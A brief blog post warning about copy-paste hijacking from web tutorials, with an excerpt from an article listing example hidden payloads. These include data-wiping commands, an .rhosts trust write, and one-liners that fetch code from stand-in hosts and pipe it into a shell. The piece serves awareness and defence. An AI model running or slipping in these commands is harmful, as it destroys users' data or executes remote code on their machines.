In an article on The H, they explain why it’s not good to simply copy and paste stuff you get from a website tutorial. What seems like a harmless command could be hiding something very dangerous.
When a user pastes what they think is an innocent command that does what the page they pasted it from advertises, another command is actually executed with their credentials automatically. This could delete all of their data or send them to a server on the public internet. If the user is still authenticated with sudo on a Linux machine, the command could even be executed with administrator privileges which could lead to much more dangerous results.
See the article here
User iteraction based exploitation: WYSINWYC (What you see is not what you copy)
When working with computers you know if there is or not a reliable and deterministic way to exploit them, ineed when working with humans there’s no certezza. Technical people often prefear to stay technical and avoid humans. This is infact our first article witch need direct human iteraction to work.
The presented technique relay on a special type of “rich text” copy where the apparently inncuos payload is pasted in a different context able to parse it. This is especially true, but definitely not limited to, online how-to.
The core concept of the attack is that the displayed text (and thus the data the user thinks to have copied) is different from what the browser have in realy copied.
A list of real life example follows, just to give you an idea.
rm -rf / del /F /S /Q * # windows /opt/custom/app abuse_my_functionality echo "*" > ~/.rhost ...
Remote storage over http
GET example.com|bash wget -q example.com -O-|bash curl -s example.com|bash echo -en "GET /\n\n"|nc example.com 80|bash ...
The shortest that comes to my mind is “GET ush.it|sh” (13 chars).
Other remote storage fetch methods
nc example.com dig AXFR evil.com @evil-dns-with-53-tcp # since zone transfers use TCP sslclient ...
As you can see small commands are limited in terms of flexibility and remote fetch/exec can be made useless by network protections (egress filtering, my-work-is-grep ids) and configuration issues (missing routing, machine offline, personal firewall, etc).
Excerpted from an article on ush.it